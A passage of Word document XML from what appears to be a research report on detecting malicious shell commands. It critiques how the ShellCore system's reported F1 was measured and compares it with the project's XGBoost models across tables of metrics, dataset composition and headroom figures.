              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mean abs. residual vs reported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>binary (malicious-class) F1 on an ≈balanced set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.012 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>support-weighted F1 at Table 2's 9.83% prevalence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.024 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.043</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>macro-averaged F1 at 9.83% prevalence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.328 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.373</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>binary (malicious-class) F1 at 9.83% prevalence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.716 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.794</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The first two fit within rounding; the last is excluded, missing every row in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the same direction by roughly seven tenths of a point. The conclusion does not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>require choosing between the two survivors, which is what makes it robust:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>**Whichever reading is correct, ShellCore's printed F1 is not the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>malicious-class F1 at the prevalence its own Table 2 implies** — the only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>quantity directly comparable to the F1 reported throughout this project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Both survivors are informative rather than damning. If the set was balanced,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the number is a fair binary F1 but its do-nothing floor is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.667</w:t>
      </w:r>
      <w:r>
        <w:t>, not the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.179 that 9.83% prevalence would give. If the metric is support-weighted at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>9.83% prevalence, then 90.2% of its weight sits on the benign class and it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>closer to accuracy than to a detection score. In that second case the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>comparable quantity can be reconstructed from the reported FNR and FPR, and it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">is still excellent: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>99.00 to 99.30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> across the six rows, best at char-level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>DNN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Four structural reasons the operating points are not comparable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Independent of the metric question, four properties of ShellCore's corpus make</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>its decision boundary a different and easier one than ours. Each is sourced to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the authors' own tables or text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The benign class is 99.65% network traffic, not shell commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>1,629,878 of 1,635,650 benign rows are unencrypted HTTP payloads; 5,772 are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>real shell history. Separating malware strings from HTTP requests is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>different task from separating attacker commands from administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>commands, which is ours — both of our classes are genuine shell commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The authors concede the point in Section 5.5: the benign set "may not be</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>considered as a representative ground-truth benign dataset with an absolute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>confidence."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Length nearly separates the classes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Table 3: malware median 384</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>characters, bash history median 14. More strikingly, the 1.6-million-row</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dominant benign source has a standard deviation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4.88 characters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> around</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a median of 185 — that is not a population of commands, it is one template at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">scale. Our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KNOWN_ISSUES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> P3 documents the same shortcut in our own data;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>here it is available at a magnitude we never had.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Near-duplication meets ungrouped folds.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 178,261 commands were extracted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>by applying 1,273 regex patterns across 2,891 binaries of a few botnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>families. Plain 10-fold CV with no reported deduplication then places</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>near-identical strings on both sides of the split. Our shape-grouped split</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>forbids exactly this, at a measured cost to our headline number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The malicious commands were never observed executing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> They are strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>pattern-matched out of static disassembly (Section 4.1), which biases the set</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>toward commands that are pattern-matchable and includes strings that may never</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>run. Dataset 2's attacks are commands intruders actually typed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Head-to-head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system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>corpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>reported F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>its floor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>headroom captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ShellCore char-DNN (balanced reading)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IoT malware vs HTTP+bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9987</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.6%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ShellCore char-DNN (reconstructed malicious-class F1 @ 9.83%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>as above</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9930</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.179</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ours, `xgboost_hybrid`, Dataset 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>offensive corpora vs docs/history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8761</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>79.3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ours, `xgboost_hybrid`, Dataset 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cowrie honeypot vs user history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>74.7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
